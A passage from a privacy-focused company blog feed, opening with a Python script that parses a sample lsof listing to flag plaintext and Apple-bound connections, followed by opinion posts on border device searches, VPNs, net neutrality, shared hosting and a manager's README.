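# Constructed sample shaped like `sudo lsof -i -P`: a plaintext captive-portal
# check, two TLS connections to Apple, one user browser, one listening socket.
SAMPLE_LSOF = """\
COMMAND           PID   USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
captiveagent      312   root    5u  IPv4 0x1a2b3c4d5e6f7081      0t0  TCP mac.local:52210->captive.apple.com:80 (ESTABLISHED)
apsd              118   root    9u  IPv4 0x1a2b3c4d5e6f7082      0t0  TCP mac.local:52211->albert.apple.com:443 (ESTABLISHED)
parsecd           640   alice  12u  IPv4 0x1a2b3c4d5e6f7083      0t0  TCP mac.local:52212->api.smoot.apple.com:443 (ESTABLISHED)
Firefox          2040   alice  44u  IPv4 0x1a2b3c4d5e6f7084      0t0  TCP mac.local:52213->example.invalid:443 (ESTABLISHED)
mDNSResponder     105   _mdnsresponder 10u IPv4 0x1a2b3c4d5e6f7085 0t0  UDP *:5353
"""


def parse_lsof(text):
    """Return (command, remote_host, remote_port) for every connected socket."""
    conns = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] == "COMMAND":
            continue
        m = _CONN.search(line)
        if m is None:
            continue  # listening sockets have no '->' and are not connections
        conns.append((fields[0], m.group(3), int(m.group(4))))
    return conns


def is_vendor_host(host):
    """True when the host is one of the vendor domains or a subdomain of one."""
    return any(host == s or host.endswith("." + s) for s in VENDOR_SUFFIXES)


def report(text):
    """Split connections into plaintext ones and (process, host) pairs to the vendor."""
    conns = parse_lsof(text)
    plaintext = [(c, h, p) for c, h, p in conns if p in PLAINTEXT_PORTS]
    vendor = sorted({(c, h) for c, h, p in conns if is_vendor_host(h)})
    return {"plaintext": plaintext, "vendor": vendor}


if __name__ == "__main__":
    r = report(SAMPLE_LSOF)
    for cmd, host, port in r["plaintext"]:
        print(f"PLAINTEXT {cmd} -> {host}:{port}")
    for cmd, host in r["vendor"]:
        print(f"vendor    {cmd} -> {host}")
```

<p>lsof only shows sockets that are open at that moment. The boot-time traffic described above, which leaves before a user-space firewall has loaded, is only visible from a packet capture taken on the router or gateway rather than on the Mac itself.</p>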

<p>Apple recently announced plans to hand control of Chinese customers' <a href="https://www.macrumors.com/2018/01/10/apple-announces-chinese-icloud-handover/" target="_blank">data</a> to a state-run firm in China, raising further questions about how it handles private user data at home and abroad. With proposed legislation designed to open data to all levels of law enforcement, privacy advocates are especially concerned.</p>

<p class="pause">He's Dead, Jim</p>

<p>Do I regret living in Apple's ecosystem for almost two decades? Not at all. Apple once possessed an intangible magic which reflected their quirky, niche audience (artists, musicians, and software developers) who built their creative legacies by looking at the world sideways. But that magic is gone, leaving behind a rotten apple core. The company now spends its time chasing the Chinese market, building campuses fit for megalomaniacs, sacrificing privacy for convenience, and ignoring the pleas of its once loyal fan base. <i>Die fetten Jahre sind vorbei</i>: The good times are over.</p>

<p class="quote">Published January 20, 2018</p>

<p class="pause">Update June 20, 2018</p>

<p>Quentin Carnicelli, founder of MacOS software development firm <i>Rogue Amoeba</i>, has publicly <a href="https://weblog.rogueamoeba.com/2018/06/14/on-the-sad-state-of-macintosh-hardware/" target="_blank">slammed</a> the "sad state" of Apple's hardware lineup, which has been deteriorating for years.</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>Border Patrol's Warrantless Searches Inside U.S.</title>
		<link href="https://neflabs.com/blog/cbp-device-searches/" />
		<id>https://neflabs.com/blog/cbp-device-searches/</id>
		<updated>2018-01-10T00:00:00Z</updated>
		<summary>Under a new directive, Customs and Border Protection (CBP) agents have broad, unchecked authority to search, seize, and share electronic devices and data within 100 miles of United States borders.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">While driving</span> to work, you're stopped at a checkpoint. Customs and Border Protection (CBP) agents use drug-sniffing dogs to search your car. Your phone and laptop are confiscated, and agents demand your passwords. No warrant has been issued for this search, and probable cause is not required. Your Fourth Amendment rights do not apply. This is legal.</p>

<p>In 1953, the Department of Justice <a href="https://www.atlasobscura.com/articles/the-long-history-of-americas-constitutionallychallenged-border-zones" target="_blank">amended</a> &sect;287.1 of Title 8 of the Code of Federal Regulations, authorizing Border Patrol agents to search and interrogate, without a warrant, any person within 100 miles of a United States border. Originally intended to identify and detain persons suspected of being in the U.S. illegally, the scope of Title 8 continues to widen. Last year, CBP set up a checkpoint on I-93 in Woodstock, NH, roughly 75 miles from the Canadian border, and used it to arrest citizens for drug possession. ACLU lawyer Buzz Scherr <a href="http://nhpr.org/post/lawyer-evidence-obtained-illegally-immigration-checkpoint-woodstock" target="_blank">commented</a> on the search.</p>

<p class="quote">"You know, what's so interesting in this case is the Chief of Police of Woodstock [Ryan Oleson] who was there afterwards said to the press, 'This was great - we got to go around the constitution because we had the feds do it - we wouldn't be able to do this by ourselves. But having that border patrol there allowed us to do it.' That was his statement to the press."</p>

<p class="pause">A Growing Threat To Civil Liberties</p>

<p>In Woodstock, police relied on a technique known as <a href="https://www.reuters.com/article/us-dea-sod/exclusive-u-s-directs-agents-to-cover-up-program-used-to-investigate-americans-idUSBRE97409R20130805" target="_blank">parallel construction</a> in which law enforcement builds a second criminal investigation to conceal how the original investigation began. Although illegally obtained evidence (wiretaps, phone records, informant tips) may be thrown out in court, a second investigation may produce enough legal evidence to charge the suspect.</p>

<p>This week, the CBP issued Directive <a href="https://www.cbp.gov/sites/default/files/assets/documents/2018-Jan/cbp-directive-3340-049a-border-search-electronic-media.pdf" target="_blank">3340-049A</a>, <i>Border Search Of Electronic Devices</i>, with instructions for border patrol agents to seize, search, and detain computers, tablets, phones, "and any other communication, electronic, or digital devices". The document reads like Swiss cheese: a series of policy loopholes and vague language which gives the CBP broad, unchecked authority.</p>

<p>Under &sect;5.2, information identified as protected by attorney-client privilege must be reviewed in coordination with the Associate/Assistant Chief Counsel Office, and business or commercial information is to be protected from unauthorized disclosure, but information "carried by journalists" receives neither protection.</p>

<p>&sect;5.1.4 states that "advanced searches" - in which external <a href="https://www.youtube.com/watch?v=l3A2xyBhZXU" target="_blank">equipment</a> is used to download and store information from a device - must receive supervisory approval, "at the Grade 14 level or higher (<b>or a manager with comparable responsibilities</b>)." &sect;5.1.5 then eliminates that requirement,</p>

<p class="quote">"In circumstances where operational considerations prevent a supervisor from remaining present for the entire advanced search, <b>or where supervisory presence is not practicable</b>, the examining Officer shall, as soon as possible, notify the appropriate supervisor about the search and any results thereof."</p>

<p>&sect;5.4.1.1 and &sect;5.4.1.2 define strict time limits for detention and destruction of seized information, yet &sect;5.5.1.3 contradicts such data protections, noting,</p>

<p class="quote">"Nothing in this Directive limits the authority of CBP to share copies of information contained in electronic devices (or portions thereof), which are retained in accordance with this Directive, with federal, state, local, and foreign law enforcement agencies to the extent consistent with applicable law and policy."</p>

<p class="pause">Protecting Your Data</p>

<p>In 2017, CBP agents searched 30,200 devices, including those belonging to American citizens, a 60% <a href="https://www.washingtonpost.com/2018/01/05/0a236202-f247-11e7-b3bf-ab90a706e175_story.html">increase</a> from the previous year. When traveling abroad, citizens should avoid taking their phones and laptops with them. Instead, travelers should use burner phones and <a href="http://mashable.com/2017/03/04/what-to-do-with-phone-international-travel/#aosQ29Z28SqY" target="_blank">secondary laptops</a> which can be easily wiped before handing them over.</p>

<p class="quote">"&sect;5.3.1 If presented with an electronic device containing information that is protected by a passcode or encryption or other security mechanism, an Officer may request the individual's assistance in presenting the electronic device and the information contained therein in a condition that allows inspection of the device and its contents. Passcodes or other means of access <b>may be requested</b> and retained as needed ..."</p>

<p>CBP cannot force citizens to hand over passwords, but it can detain you and your devices for a limited time. Be prepared to stand your ground only if you understand the consequences of defying a federal agency, and treat any device which has left your supervision as potentially compromised.</p>

<p class="pause">CT, DE, FL, HI, ME, MA, NH, NJ, NY, RI, VT</p>

<p>It is estimated that <a href="https://www.aclu.org/other/constitution-100-mile-border-zone" target="_blank">two thirds</a> of Americans live inside Title 8's constitution-free zone, which includes New York City, Los Angeles, Chicago, Houston, Philadelphia, Phoenix, San Antonio, San Diego, and San Jose. Eleven states are completely inside the zone.</p>

<p>According to the ACLU, CBP has established over 170 checkpoints inside the country. And while checkpoints are not supposed to be used for warrantless searches, they often are. Motorists who encounter these agents have the same choices faced by international travelers: keep dummy devices on you at all times or use encryption, stand your ground, and face detention.</p>

<p>Editorial Disclosure: Nefarious Laboratories has developed a comprehensive <a href="/products/">Digital Security & Training</a> service for journalists, activists, and political campaigns.</p>

<p class="quote">Published January 10, 2018</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>Without AES Over Port 443, VPN Is Compromised</title>
		<link href="https://neflabs.com/blog/vpn-is-compromised/" />
		<id>https://neflabs.com/blog/vpn-is-compromised/</id>
		<updated>2018-01-05T00:00:00Z</updated>
		<summary>VPN services are a vital tool for protecting free speech. Following the death of net neutrality, their business model is more vulnerable than ever. If they don't adapt to protect themselves from ISPs, they'll become obsolete.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">VPN</span> services are a vital tool for protecting free speech. Following the death of net neutrality, their business model is more vulnerable than ever. If they don't adapt to protect themselves from ISPs, they'll become obsolete.</p>

<p>Yesterday's virtual private networks were designed to give employees remote access to corporate servers. Today that same technology is used to anonymize internet activity using random exit nodes across the globe. It protects journalists, activists, and everyday citizens who don't want their personal browsing history stored, analyzed, and sold.</p>

<p>The best VPN services allow signups with gift cards and anonymous email accounts, and offer at least two high bandwidth servers. The loss of net neutrality has changed the game, and forward-thinking services will need to encrypt traffic with a minimum cipher of AES-128, and allow users to route traffic over multiple ports - including port 443. Together, all of these options will help protect users' identity and hide traffic from the prying eyes of ISPs and state actors.</p>

<p class="pause">Why AES And 443?</p>

<p>Without net neutrality, ISPs can eliminate VPN use by blocking the ports on which they operate. <a href="https://helpdesk.privateinternetaccess.com/hc/en-us/articles/225274288-Which-encryption-auth-settings-should-I-use-for-ports-on-your-gateways-" target="_blank">Private Internet Access</a> operates over many ports, but only a handful (501, 502, 1197, 1198) support AES encryption. These are trivial to block. Other ports (53, 80, 443, 8080) cannot be blocked, but are limited to the outdated BF-CBC cipher. Not only is this an insecure cipher, it precludes use on network appliances such as home routers.</p>

<p>For VPNs to continue making money, protecting their user base is paramount. If ISPs force these companies to close up shop, there will be no turning back.</p>

<p class="quote">Published January 05, 2018</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>
	
	<entry>
		<title>Why We Left MassTLC (And You Should Too)</title>
		<link href="https://neflabs.com/blog/why-we-left-masstlc/" />
		<id>https://neflabs.com/blog/why-we-left-masstlc/</id>
		<updated>2018-01-01T00:00:00Z</updated>
		<summary>The Massachusetts Technology Leadership Council has a laudable mission, but the "most powerful technology association in the region" appears more concerned with political maneuvering than with innovation.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">The Massachusetts</span> Technology Leadership Council (<a href="http://www.masstlc.org/about-masstlc/" target="_blank">MassTLC</a>) is advertised as "the largest and most powerful technology association in the region" with a mission to "accelerate growth and innovation in the Massachusetts technology industry". When a member of the product management community urged us to join, we signed up for their entry-level membership ($275 per year). That was two years ago.</p>

<p>Recently, the FCC scrapped <a href="/blog/net-neutrality-will-die" target="_blank">net neutrality</a>, a set of rules which protected free speech on the internet. Without them, small businesses may end up behind a paywall, where potential customers might never learn of their existence. CenturyLink, Comcast, Verizon, and other telecoms stand to make billions. Strangely, MassTLC stayed silent on an issue which directly impacts their small business members.</p>

<p class="quote">"If you're the smartest person in the room, you're in the wrong room."<br /><br />Unknown</p>

<p>Nefarious Labs COO Steven DeFrias and I attended MassTLC's CXO Holiday party, held on December 13, the night before the FCC's vote to scrap net neutrality. Around the room, the reaction was the same: "What vote?" "Hang on, what's net neutrality again?" I was surrounded by fellow tech CEOs, and on this particular topic, I was the smartest person in the room. Not a good sign.</p>

<p>I was introduced to the President & CEO of MassTLC, <a href="https://twitter.com/thopcroft" target="_blank">Tom Hopcroft</a>, and pointedly asked his perspective on the upcoming vote. I had hoped for some kind of affirmation that those of us in the small business community were heard and supported. Tom deflected question after question, preferring to discuss MassTLC's support for progressive immigration policy. He mentioned Comcast and Verizon. "Aren't they members?" I asked.</p>

<p>It turns out that Amazon, Autodesk, CenturyLink, Chubb, Comcast, Deloitte, Google, Kaspersky Lab, Microsoft, Oracle, Raytheon, TiVo, and Verizon are all members of MassTLC. Most of these conglomerates aren't even located in Massachusetts. Chubb is an insurance company headquartered in Switzerland. Raytheon is a major U.S. defense contractor. <a href="https://www.reuters.com/article/us-kasperskylab-probe/u-s-senators-seek-military-ban-on-kaspersky-lab-products-amid-fbi-probe-idUSKBN19J2IX" target="_blank">Kaspersky Lab</a> is currently under investigation by the FBI for illegal activity linked to the KGB. They are rumored to have paid $10,000 to join MassTLC in October 2017, months after the investigation was announced.</p>

<p>Wait a minute, why are we doing business with these people? Are we paying an organization which represents corporate interests for political reasons, for reasons which have nothing to do with innovation? How much do CenturyLink, Comcast, and Verizon pay to be members? Verizon has over 100,000 employees, and according to MassTLC's <a href="http://www.masstlc.org/benefits/" target="_blank">pricing</a> page, companies with over 1,000 employees pay $16,500 annually. That's a lot of money. Does that buy them a seat at the table to which smaller members aren't invited? If MassTLC doesn't vocally and vehemently support net neutrality and the small businesses which depend on it, isn't this just bribery with extra steps? Money for a voice. Or for silence.</p>

<p>I don't have all the answers, but as the CEO of Nefarious Laboratories, it is my responsibility to act according to our moral principles. I cannot justify contributing to an organization which benefits corporate interests while harming our small business and endangering our prospects for success. And I cannot in good conscience remain a member of MassTLC when their President & CEO dodges the important questions surrounding net neutrality, members under federal investigation, and pay to play politics.</p>

<p class="quote">Published January 01, 2018</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>KGB Continues to Target U.S. Journalists</title>
		<link href="https://neflabs.com/blog/kgb-targets-journalists/" />
		<id>https://neflabs.com/blog/kgb-targets-journalists/</id>
		<updated>2017-12-22T00:00:00Z</updated>
		<summary>Traditional approaches are failing to protect journalists against an evolving digital threat from state-sponsored hacking groups. With Russia under the microscope, the potential fallout is greater than ever.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">You stand</span> on the platform waiting for your train. A man stands close to you. Too close. He takes out his phone and starts speaking in Russian, loudly, and when you look toward him, he's staring at you.</p>

<p>KGB intimidation tactics are on the rise as Russian activity has come under greater scrutiny by American press. Over the past few years, the attacks have become more sophisticated, with state-sponsored hacking groups like <a href="https://en.wikipedia.org/wiki/Fancy_Bear" target="_blank">Fancy Bear</a> targeting journalists' phones, computers, and messaging platforms.</p>

<p>Entire news organizations have been <a href="https://apnews.com/c3b26c647e794073b7626befa146caad" target="_blank">bombarded</a> by phishing attacks, attempting to gather information on individuals and security measures via email and phone. In the past, journalists have had to focus on keeping secrets from the outside world; now they must also keep secrets from their own employer.</p>

<p class="quote">The AP identified journalists as the third-largest group on a hacking hit list obtained from cybersecurity firm Secureworks, after diplomatic personnel and U.S. Democrats. About 50 of the journalists worked at The New York Times. Others were prominent media figures in Ukraine, Moldova, the Baltics or Washington.</p>

<p>The Committee to Protect Journalists has produced a <a href="https://cpj.org/reports/2012/04/technology-security.php" target="_blank">Technology Security</a> guide, offering a rough outline of best practices. Originally published in 2012, the report contains misleading information and does not explicitly detail how to achieve a baseline security posture in today's digital environment.</p>

<p>Editorial Disclosure: Nefarious Laboratories has developed a comprehensive <a href="/products/">Digital Security & Training</a> service for journalists, activists, and political campaigns.</p>

<p class="quote">Published December 22, 2017</p>

<p class="pause">UPDATE January 18, 2018</p>

<p>The Electronic Frontier Foundation and a mobile security firm have released a joint <a href="https://blog.lookout.com/dark-caracal-mobile-apt" target="_blank">report</a> detailing an organization known as Dark Caracal, operating out of the Lebanese General Security Directorate (GDGS) in Beirut. Since 2012, the group has stolen data from journalists, corporations, and military officers in 21 countries using malware hidden in fake versions of secure messaging apps. According to the report, the attacks relied heavily on social engineering, convincing targets to download and install the apps themselves.</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>Net Neutrality Is Going To Die Next Week</title>
		<link href="https://neflabs.com/blog/net-neutrality-will-die/" />
		<id>https://neflabs.com/blog/net-neutrality-will-die/</id>
		<updated>2017-12-08T00:00:00Z</updated>
		<summary>The Federal Communications Commission is a pawn in the hands of corrupt officials and a telecommunications oligopoly, and next week's vote will curtail freedom of speech online and usher in an era of information asymmetry.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">For 83 years</span> under the Communications Act of 1934, the Federal Communications Commission (FCC) has been tasked with regulating radio, television, wire, satellite, and cable. The commission has never directly represented the American people; its five commissioners are appointed by the President of the United States, leaving it a pawn in the hands of corrupt officials and a telecommunications oligopoly.</p>

<p class="quote">"We have, not one or two or three, but many, established monopolies in the United States. We have restricted credit, we have restricted opportunity, we have controlled development, and we have come to be one of the worst ruled, one of the most completely controlled and dominated, governments in the civilized world - no longer a government by free opinion, no longer a government by conviction and the vote of the majority, but a government by the opinion and the duress of small groups of dominant men.<br /><br />If the government is to tell big business men how to run their business, then don't you see that big business men have to get closer to the government even than they are now? Don't you see that they must capture the government, in order not to be restrained too much by it? They have already captured it. They don't have to get there. They are there."<br /><br />Woodrow Wilson, The New Freedom, 1913</p>

<p>In 1992, under the purview of the FCC, internet service providers (ISPs) claimed they would deliver high-speed internet service across the country, building fiber optic networks in every state. These networks were to be made available to any local internet service provider, creating new jobs and increasing competition in the market. To pay for the proposed rollout, virtually every state offered ISPs significant tax incentives, and allowed the companies to charge customers higher prices and fees for internet access. Today, the American people have given ISPs (Verizon, Comcast, AT&T, et al) over $400 billion.</p>

<p class="pause">They Took The Money And Ran</p>

<p>In 2015, the Pew Research Center <a href="http://www.pewinternet.org/fact-sheet/internet-broadband/" target="_blank">reported</a> only 50% of rural communities had access to broadband internet, highlighting ISPs' failure to build networks. Including urban areas, the rate was only marginally improved: 66%, leaving one third of the country without broadband access. The same year, PBS <a href="https://www.pbs.org/newshour/world/internet-u-s-compare-globally-hint-slower-expensive" target="_blank">reported</a> competition in the broadband market was virtually non-existent, leaving half of Americans with the false "choice" of a single broadband provider (25+ Mbps) and a telephone-based provider (1 Mbps Max). This is the very definition of a duopoly, in which two suppliers collude to dominate the market. As a result, while consumers in other countries enjoy internet speeds 10x faster, Americans pay double or triple the price for slow internet access.</p>

<p>As tax benefits and inflated prices pushed ISP profits ever higher, executives spent the money on themselves. Last year, the CEO of Comcast was <a href="https://www1.salary.com/Brian-L-Roberts-Salary-Bonus-Stock-Options-for-COMCAST-CORP.html" target="_blank">paid</a> over $28 million including salary, bonuses, and stock options. The CEO of Verizon was <a href="https://www1.salary.com/Lowell-McAdam-Salary-Bonus-Stock-Options-for-VERIZON-COMMUNICATIONS-INC.html" target="_blank">paid</a> over $17 million. While executives were busy pocketing American tax dollars, relaxed FCC regulations allowed ISPs to interfere with internet traffic, throttling and blocking competing services around the globe. This is what a "free market" looks like:</p>

<p class="cited">
<b>2005</b><br />
Comcast secretly blocked file-sharing and peer-to-peer communications using a technique known as TCP Reset Spoofing, and refused to confirm their actions for two years until the Associated Press and the Electronic Frontier Foundation published reports.<br /><br />

<b>2007</b><br />
AT&T and Apple made a secret agreement to ban iPhone apps which allowed users to make phone calls over the AT&T network, instead forcing app developers to cripple their software or face rejection from Apple's App Store.<br /><br />

<b>2011</b><br />
MetroPCS announced it would block streaming video from all sources except YouTube over its 4G network. The company initially sued the FCC to force the issue, then agreed to a buyout from T-Mobile and dropped the suit.<br /><br />

<b>2012</b><br />
Verizon prevented its wireless network users from sharing their monthly data with any other device (known as "tethering") unless users agreed to pay a $20 monthly fee. Although the FCC eventually ordered Verizon to drop the fee, the company simply rolled it into more expensive monthly plans.
</p>

<p>These practices and others, tantamount to legal misrepresentation and extortion, led to an increase in consumer complaints and lawsuits, and in 2015 the FCC was forced to issue a net neutrality order, codifying broadband internet as a utility service under three <a href="https://cdt.org/blog/rules-of-the-road-net-neutralitys-bright-line-protections/" target="_blank">bright-line rules</a>.</p>

<p class="cited">
<b>No Blocking</b>: ISPs cannot block legal content or legal methods of access.<br /><br />

<b>No Throttling</b>: ISPs cannot slow speeds based on the content or method of access.<br /><br />

<b>No Paid Prioritization</b>: ISPs cannot accept payment in return for favorable access.
</p>

<p>Not only does net neutrality prevent interference with internet traffic, it also guarantees freedom of speech online. Despite overwhelming support from Americans (including 72% of <a href="http://thehill.com/policy/technology/341850-poll-gop-voters-support-net-neutrality-rules-oppose-att-time-warner-merger" target="_blank">conservatives</a>), three of the five FCC commissioners have already signaled their intent to repeal net neutrality. Given the likely outcome of the scheduled vote, Commissioner Mignon Clyburn has already issued her <a href="https://www.fcc.gov/news-events/blog/2017/11/29/fcc-should-not-give-broadband-providers-keys-your-internet-freedom" target="_blank">dissent</a>.</p>

<p>Putting the vote in the hands of the FCC eliminates the voice of the American people, but Congress has the <a href="https://en.wikipedia.org/wiki/Congressional_Review_Act" target="_blank">power</a> to overrule a regulation. So ISPs <a href="https://motherboard.vice.com/en_us/article/7xwknx/republican-members-of-congress-fcc-letter" target="_blank">bribed</a> Congress. Republicans in <i>Alabama, Arizona, Arkansas, California, Colorado, Florida, Georgia, Idaho, Indiana, Iowa, Kansas, Kentucky, Louisiana, Michigan, Minnesota, Mississippi, Missouri, Nebraska, New Jersey, New York, North Carolina, North Dakota, Ohio, Oklahoma, Oregon, Pennsylvania, South Carolina, Tennessee, Texas, Virginia, Washington, West Virginia, and Wisconsin</i> sold you and this nation to the telecom lobby for a total of $15.5 million.</p>

<p class="pause">The Era Of Information Asymmetry</p>

<p>In 2014, CEO Mark Zuckerberg attempted to launch a free internet service in India, with a catch: the service would only connect to a handful of websites, and most importantly, to Facebook. Around the country, citizens recognized this as an extortion-based business model and vehemently rejected the offer, culminating in a nationwide <a href="https://internetfreedom.in/startups-pm-letter/" target="_blank">demonstration</a> to establish net neutrality laws.</p>

<p>What happened in India won't happen here. Perhaps <i>the</i> most insidious threat to the future of free speech is free internet. Without net neutrality, ISPs could offer a free internet package: Google, Facebook, Netflix, Amazon, and Fox News. Those companies would pay a fortune to participate, but they would control what you search, what you watch, what you buy, and what you know. That's incredibly dangerous power, and a threat to democracy.</p>

<p>State attorneys general and digital rights groups including the <a href="https://www.eff.org" target="_blank">EFF</a>, <a href="https://www.publicknowledge.org" target="_blank">Public Knowledge</a>, and <a href="https://www.freepress.net" target="_blank">Free Press</a> have promised to sue the FCC should they vote to repeal net neutrality. Jurisdiction will play a key role in their legal strategy given that some judges are more likely to stay the commission's order during the trial.</p>

<p>Editorial Disclosure: The CEO of Nefarious Laboratories currently holds a GMRS radio license, issued by the FCC.</p>

<p class="quote">Published December 08, 2017</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>The Corrupted State Of Shared Hosting</title>
		<link href="https://neflabs.com/blog/state-of-hosting/" />
		<id>https://neflabs.com/blog/state-of-hosting/</id>
		<updated>2017-10-07T00:00:00Z</updated>
		<summary>From media consolidation and shady fine print to decades-old security risks, shared hosting companies are raking in massive profits while leaving consumers holding a virtual stick of dynamite.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">Endurance International Group</span> (<a href="https://www.google.com/finance?q=NASDAQ:EIGI" target="_blank">EIG</a>) delivers hosting, backup, analytics, digital advertising, and email marketing solutions to 5.37 million subscribers globally. Like a drug dealer, the company refers to their hosting packages as "gateway products". This is not an exaggeration; this is how they are described in the company's own <a href="http://files.shareholder.com/downloads/AMDA-290LKD/5810175963x0x933610/36C4ACBC-2438-40F0-8B67-E4A8019F8ADF/2016_EIG_Annual_Report_to_Stockholders.pdf" target="_blank">annual report</a>.</p>

<p>EIG operates over 80 subsidiary <a href="https://en.wikipedia.org/wiki/Endurance_International_Group" target="_blank">brands</a>, including Bluehost, Constant Contact, Domain.com, FastDomain, HostGator, HostMonster, iPage, MyDomain, SiteBuilder, SinglePlatform, and TypePad. Each brand has its own marketing, social media fan base, and thousands of positive reviews. Some have Terms Of Use clauses which have <a href="http://www.newsweek.com/us-web-firms-practice-self-censorship-76329" target="_blank">influenced</a> government policy and <a href="http://www.autostraddle.com/bluehost-sucks-or-how-mormon-owned-bluehost-tried-to-shut-down-autostraddle/" target="_blank">censored</a> content on religious grounds.</p>

<p>This type of media consolidation promotes consumerism while <a href="http://www.benkler.org/Benkler_Wealth_Of_Networks.pdf" target="_blank">limiting</a> discussion and innovation, yet industry-authored campaigns brazenly <a href="http://www.wired.com/insights/2013/12/consumerism-expression-innovative-capacity/" target="_blank">claim</a> consumerism is an "expression of innovative capacity". Federal regulators appear uninterested in addressing the issue. The resulting uncontested market space has been a boon for EIG, which earned $1.1 billion in revenue and $351 million in profit during the last fiscal year.</p>

<p class="pause">Security Vulnerabilities From 1995</p>

<p>How do these companies generate so much profit? By using outdated technology. Both Microsoft IIS and Apache web servers were introduced in 1995, in an era before default TLS and HTTP/2 were even considered. No matter how many updates they receive, they're built on outdated principles and architectures, their patched vulnerabilities stacked like an unstable tower of Jenga blocks. And that makes them cheap. They're cheap to install, to run, and to manage.</p>

<p>Even <a href="https://juxt.pro/blog/posts/cloudbleed.html" target="_blank">newer</a> shared hosting platforms are (typically) configured with the most <a href="https://schd.io/5kes" target="_blank">permissive</a> security settings. This drives revenue for the hosting company in three ways. First, allowing clients to run virtually any code without restriction reduces potential calls to customer support. Second, tracking code is quietly inserted into each client site, collecting visitor information which is then sold to data mining companies. Third, relaxed security settings open doors for advertising partners to track site visitors after they leave the site.</p>

<p class="pause">5.37 Million Legal Timebombs</p>

<p>Many of the sites hosted on these platforms showcase meticulously crafted privacy policies which promise various data protections for visitors. But in truth, permissive security settings leave visitors exposed to weak authentication methods, cross-site tracking and exploits, and leaks of personally identifiable information.</p>

<p>This represents a massive legal risk to every organization (small businesses, universities, hospitals) using a shared hosting platform. They could be sued for failing to protect user data, and in the EU, website operators face significant <a href="https://en.wikipedia.org/wiki/General_Data_Protection_Regulation" target="_blank">fines</a> under the General Data Protection Regulation (GDPR) when it goes into effect on May 25, 2018.</p>

<p class="pause">Captive Market By Any Other Name</p>

<p>Developing independently hosted content can be challenging for users who lack the requisite technical knowledge. Coupled with <a href="https://www.theguardian.com/technology/2016/mar/18/redaction-fbi-target-ladar-lavabit-spy-edward-snowden" target="_blank">national security</a> concerns, that leaves the majority of independent developers and consumers with limited shared hosting options.</p>

<p>Editorial Disclosure: Nefarious Laboratories offers <a href="/products/">secure hosting</a> solutions for small businesses, non-profits, and individuals.</p>

<p class="quote">Published October 07, 2017</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

<entry>
		<title>Ethan.README</title>
		<link href="https://neflabs.com/blog/ethan-readme/" />
		<id>https://neflabs.com/blog/ethan-readme/</id>
		<updated>2017-09-01T00:00:00Z</updated>
		<summary>This document is designed to help you understand how I think and work, and to accelerate our working relationship. This is a living document; it will change over time.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">Hi</span>, welcome to the team.</p>

<p>This document is designed to help you understand how I think and work, and to accelerate our working relationship. It is not intended to replace the organic mutual understanding I hope to build as we work together. This is a living document; it will change as I grow.</p>

<p class="pause">My Role As A Manager</p>

<p>I am here to help you. You were hired for your experience and skills, and I am not going to tell you how to do your job. My goal is to maximize your performance and to help you grow as a professional. When you need help, you should ask for it without hesitation.</p>

<p>Provide context. Most of my day is spent identifying new trends, reframing existing concepts, and sharing that information with team members. These conversations will help you build and maintain a global perspective across our products and projects.</p>

<p>Cheer! No achievement is too small to celebrate. I believe in leading with positive reinforcement, and rewarding both individual and team successes.</p>

<p>I also write a lot of code.</p>

<p class="pause">My Principles & Vision</p>

<p>I believe we are the universe experiencing itself, that life is neither the destination nor the journey. It is important to me that people are treated fairly, and I prioritize human experiences over systems and profit. Profit is merely a consequence of our actions, the building blocks of our legacy.</p>

<p>If a company's persona is a reflection of its leadership, Nefarious Laboratories is a rebel. We seek to challenge and subvert the status quo (domestic surveillance, corporate greed, military contracts, closed source, anti-patterns, negligence, apathy) by uniting people to build better solutions. We value altruistic "troublemakers" and radical innovators with divergent interests.</p>

<p>I was nearly kicked out of my MBA for asking the Chairman of a Fortune 500 company how he could justify laying off 125 employees while the CEO received a $9 million raise the same year. When a toy company asked me to work on a project adding cameras and microphones to their toys, I refused. These actions and their consequences, more than mere words, define my adherence to my ethical principles.</p>

<p>I heavily bias toward action, and have little patience for unnecessary deliberation or indifference. Debating potential directions is often valuable, but I believe starting is the best way to find failure, growth, and mastery.</p>

<p class="quote">"A human being should be able to change a diaper, plan an invasion, butcher a hog, conn a ship, design a building, write a sonnet, balance accounts, build a wall, set a bone, comfort the dying, take orders, give orders, cooperate, act alone, solve equations, analyze a new problem, pitch manure, program a computer, cook a tasty meal, fight efficiently, die gallantly. Specialization is for insects." - Robert Heinlein</p>

<p class="pause">Our Average Week</p>

<p>We'll have a 1:1 meeting every week for at least 1 hour no matter what. These meetings are for you, and should cover topics of substance as well as your needs and feelings.</p>

